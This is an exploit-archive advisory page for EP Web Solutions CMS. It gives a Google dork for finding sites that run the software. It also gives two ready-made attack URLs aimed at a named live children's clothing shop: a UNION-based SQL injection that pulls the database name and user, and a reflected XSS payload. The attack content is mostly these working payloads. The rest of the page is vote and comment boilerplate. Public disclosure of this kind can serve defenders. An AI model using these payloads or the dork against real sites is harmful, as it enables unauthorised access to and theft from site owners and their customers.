EP Web Solutions CMS – SQL Injection and XSS Vulnerability

2020.09.29

Mostafa Farzaneh (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: intext:"EPweb " or " Evergreen Park Web"

#Exploit Title: EP Web Solutions CMS – SQL Injection and XSS Vulnerability 
#Date: 2020-09-28
#Exploit Author: Mostafa Farzaneh
#Vendor Homepage: evergreenparkweb.com
#Google Dork: intext:"EPweb " or " Evergreen Park Web"
#Category: webapps
#Tested On: windows 10, Firefox
#Software Link: evergreenparkweb.com
 
SQL Injection
Demo: https://www.martinellischildrenswear.com/product_details.php?ID=-890%27%20UNION%20SELECT%201,database()%20,user(),4,5,6,7,8,9,10,11,12,13,14--%20-
################################################################################
Cross Site Scripting (XSS)
Demo:https://www.martinellischildrenswear.com/shop.php?search=%22/%3E%3Cscript%3Ealert`PywebSecurity`%3C/script%3E


********************************************************* 
#Discovered by: Mostafa Farzaneh from PywebSecurity team
#Telegram: @pyweb_security
*********************************************************

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

EP Web Solutions CMS – SQL Injection and XSS Vulnerability

Dork: intext:"EPweb " or " Evergreen Park Web"

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.